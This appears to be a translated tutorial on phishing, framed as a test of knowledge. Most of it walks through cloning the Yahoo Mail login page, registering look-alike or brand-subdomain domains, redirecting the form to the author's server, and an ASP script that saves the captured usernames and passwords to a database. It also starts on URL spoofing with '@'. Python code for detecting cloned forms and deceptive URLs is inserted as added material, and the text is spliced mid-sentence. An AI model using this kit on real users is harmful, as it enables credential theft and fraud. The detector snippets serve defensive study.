Measure the test taker's knowledge about the implementation and prevention of phishing.

Source: Internet
Author: User

Phishing has received more and more attention because of the serious harm it does to the interests of Internet users and to the Internet's reputation system. An Anti-Phishing Working Group (APWG) has been set up internationally. It is a joint body with approximately 800 members from approximately 490 financial service companies, technology companies, service providers, national law enforcement agencies, and legislatures; these organizations provide industry stakeholders with a confidential forum for discussing phishing issues. The group tries to define the scope of phishing in terms of both hard cost and soft cost, holding meetings and discussions electronically among its members and sharing information and best practices to eliminate existing problems. We hope to eliminate the phishing trap completely in the near future and give everyone a sincere and honest Internet.

I. Principles of phishing:

The term "phishing" combines "fishing" and "phone". Because the early hackers committed their crimes by phone, the "f" was replaced with "ph", giving "phishing", which is pronounced the same as "fishing". In itself, phishing is not an independent attack technique; it is more a method of fraud, just like the swindles of real society. Attackers use fraudulent emails and forged websites to trick visitors into providing personal information such as credit card numbers, account names, passwords, and Social Security numbers (typically information related to finances and accounts, which is then used to obtain illegitimate gains), and the deceived visitors often hand over their financial data.

Nowadays the technical means of phishing are becoming more and more sophisticated, such as malicious code hidden in images and keystroke-logging programs. There are also fake websites whose appearance is identical to that of legitimate ones; these fake sites can even display the padlock security icon at the bottom of the browser. Phishing techniques are getting increasingly tricky. Here we first introduce the workflow of phishing, which usually has five phases:

Figure 1

1. The fisherman breaks into the primary server and steals user names and email addresses.

2. The fisherman sends an email of a specific nature.

3. The victim visits a fake website.

4. The victim enters secret information, and the fisherman obtains the user's data.

5. The fisherman uses the identity of the victim to access other network servers.

Malicious spam was covered earlier. Here we implement and carry out the third phase: counterfeiting the target website so that the target user visits the fake site and our deception is complete.

II. Implementation Method

Next we will implement a simple phishing web page. You can add to and modify the page as needed.

1. First, apply for web space to store our page.

2. Apply for a domain name. To achieve the spoofing effect, we can apply for a domain name similar to that of the website we want to imitate: for example, for www.yahoo.com we apply for www.yaho.com, and so on.

If such domain names cannot be registered, we can instead make use of our own second-level domain names.

For example, if our own domain name is tcbmail.com, we can add the second-level domain yahoo.tcbmail.com to increase the success rate of the spoofing.

Bind our web space to our domain name.

3. Select a target and modify the code.

Next, let's look at the target of our deception. Here we take Yahoo as an example; similar methods work for other websites.

Open the home page of Yahoo Mail: https://login.yahoo.com/config/mail?.intl=us

Figure 2

View the page source. We can see this statement:

This statement submits the values of the form's input fields to the processing page in the background, https://login.yahoo.com/config/login?. This is where the opportunity lies: we can create a copy of the Yahoo Mail home page, replace the page it submits to with our own page, process the submission through a back-end database, and so intercept the target account's password.

Next, let's look at the specific steps.

Save the Yahoo Mail home page to your local machine.

Find the form tag whose action points at the Yahoo login handler (https://login.yahoo.com/config/login?, quoted above) and change it to:

<form method="post" action="http://our-own-domain-name/test.asp" target="_self">

Save the result as mail.html.

4. Write test.asp to store the submitted values in our database. Here we use an Access database directly, with the following code:

<%
' Read the two fields posted by the copied login form (the names match Yahoo's form fields)
Dim db, strcon, qq, pass, rs, strSql
qq = Request("username")
pass = Request("passwd")
' Open the Access database pass.mdb that sits next to this script
strcon = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("pass.mdb")
Set db = Server.CreateObject("ADODB.Connection")
db.Open strcon
' Text values must be quoted in the INSERT (the original omitted the quotes and would fail);
' note that the values are concatenated straight into the SQL, so this script is itself SQL-injectable
strSql = "insert into [name] ([name], pass) VALUES ('" & qq & "','" & pass & "')"
db.Execute strSql
db.Close
%>

5. Upload the edited mail.html, test.asp, and pass.mdb to the web space.

Access http://our-own-domain-name/mail.html

Does it show Yahoo's email home page?

When you enter a user name and password, the input is stored in our own database pass.mdb, and the spoofing has succeeded.
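From the defender's side, the tell-tale sign of a page built this way is a login form whose action no longer posts to the legitimate host. The following Python check is an added example, not code from the original article: the HTML sample is constructed, and `legit_host` (assumed here to be login.yahoo.com) is the host the credential form is expected to post to.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class CredentialFormFinder(HTMLParser):
    """Collect the action attribute of every <form> that contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of (action, has_password_field)
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None

def suspicious_credential_forms(html, page_url, legit_host):
    """Return the actions of password forms that post anywhere other than legit_host."""
    finder = CredentialFormFinder()
    finder.feed(html)
    flagged = []
    for action, has_password in finder.forms:
        if not has_password:
            continue
        # resolve relative actions (e.g. "test.asp") against the page's own URL
        host = (urlparse(urljoin(page_url, action)).hostname or "").lower()
        if host != legit_host.lower():
            flagged.append(action)
    return flagged

# Constructed sample: the saved Yahoo Mail page with the form action rewritten as in step 3.
CLONED_PAGE = """<html><body>
<form method="post" action="http://yahoo.tcbmail.com/test.asp" target="_self">
<input name="username"><input type="password" name="passwd"><input type="submit">
</form></body></html>"""
GENUINE_PAGE = CLONED_PAGE.replace("http://yahoo.tcbmail.com/test.asp",
                                   "https://login.yahoo.com/config/login")

if __name__ == "__main__":
    print(suspicious_credential_forms(CLONED_PAGE, "http://yahoo.tcbmail.com/mail.html", "login.yahoo.com"))
    print(suspicious_credential_forms(GENUINE_PAGE, "https://login.yahoo.com/config/mail", "login.yahoo.com"))
```

The same comparison works on a page fetched from a suspicious link, and a relative action such as "test.asp" is resolved against the page's own host, so it is flagged too.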

Figure 3

Of course, users are more security-aware than before; careful people who look closely at the link we send will still notice that the web address differs from the real one.

However, the more deceptive your domain name is, the higher your success rate will be.

For example: http://mail.yaho.com.cn/mail.html. Doesn't it look similar?

Or add a second-level domain name.

For example: http://yahoo.duay.com/mail.html can also be quite deceptive.

But what if the domain name you applied for is something like www.tiger.com? What should we do then?

The following describes several URL spoofing methods.

III. Implementation Techniques

1. Spoofing through special-symbol parsing

In the HTTP specification, the complete format after the protocol name is http://IP:@name:pass/. Only the IP part is required; "@" is followed by the user-name parameter
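The three URL tricks described in this article (a look-alike registrable name such as yaho.com, the brand name used as a subdomain of an unrelated domain such as yahoo.tcbmail.com, and text placed before "@", which URL parsers treat as userinfo rather than as the host) can be recognised mechanically. The Python checker below is an added example, not part of the original article; its public-suffix list is a deliberately tiny hard-coded assumption, and the URLs are constructed from the article's own examples.

```python
from urllib.parse import urlsplit

# Assumption: a tiny stand-in for the public-suffix list, enough for the article's examples.
TWO_LABEL_SUFFIXES = {"com.cn", "co.uk", "com.au"}

def registrable_domain(host):
    """'mail.yaho.com.cn' -> 'yaho.com.cn'; 'yahoo.tcbmail.com' -> 'tcbmail.com'."""
    labels = host.lower().split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])

def edit_distance(a, b):
    """Levenshtein distance, used to spot typosquats such as 'yaho' vs 'yahoo'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def url_deceptions(url, legit_domain):
    """List the impersonation tricks found in url relative to legit_domain (e.g. 'yahoo.com')."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    # http://www.yahoo.com@evil.example/ : everything before '@' is userinfo, not the host
    if parts.username is not None:
        findings.append("userinfo-before-@: real host is " + host)
    reg = registrable_domain(host)
    if reg == legit_domain.lower():
        return findings  # the registrable domain really is the legitimate one
    brand = legit_domain.split(".")[0]
    # brand name used as a subdomain of an unrelated domain, e.g. yahoo.tcbmail.com
    if brand in host.split(".")[:-len(reg.split("."))]:
        findings.append("brand-as-subdomain of " + reg)
    # look-alike registrable name, e.g. yaho.com(.cn) standing in for yahoo.com
    if 0 < edit_distance(reg.split(".")[0], brand) <= 2:
        findings.append("lookalike domain " + reg)
    return findings

if __name__ == "__main__":
    for u in ("https://login.yahoo.com/config/mail?.intl=us",
              "http://mail.yaho.com.cn/mail.html",
              "http://yahoo.duay.com/mail.html",
              "http://www.yahoo.com@yahoo.duay.com/mail.html"):
        print(u, "->", url_deceptions(u, "yahoo.com"))
```

A production checker would replace TWO_LABEL_SUFFIXES with the full public-suffix list and extend the look-alike test to homoglyphs, but the three classes of finding stay the same.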
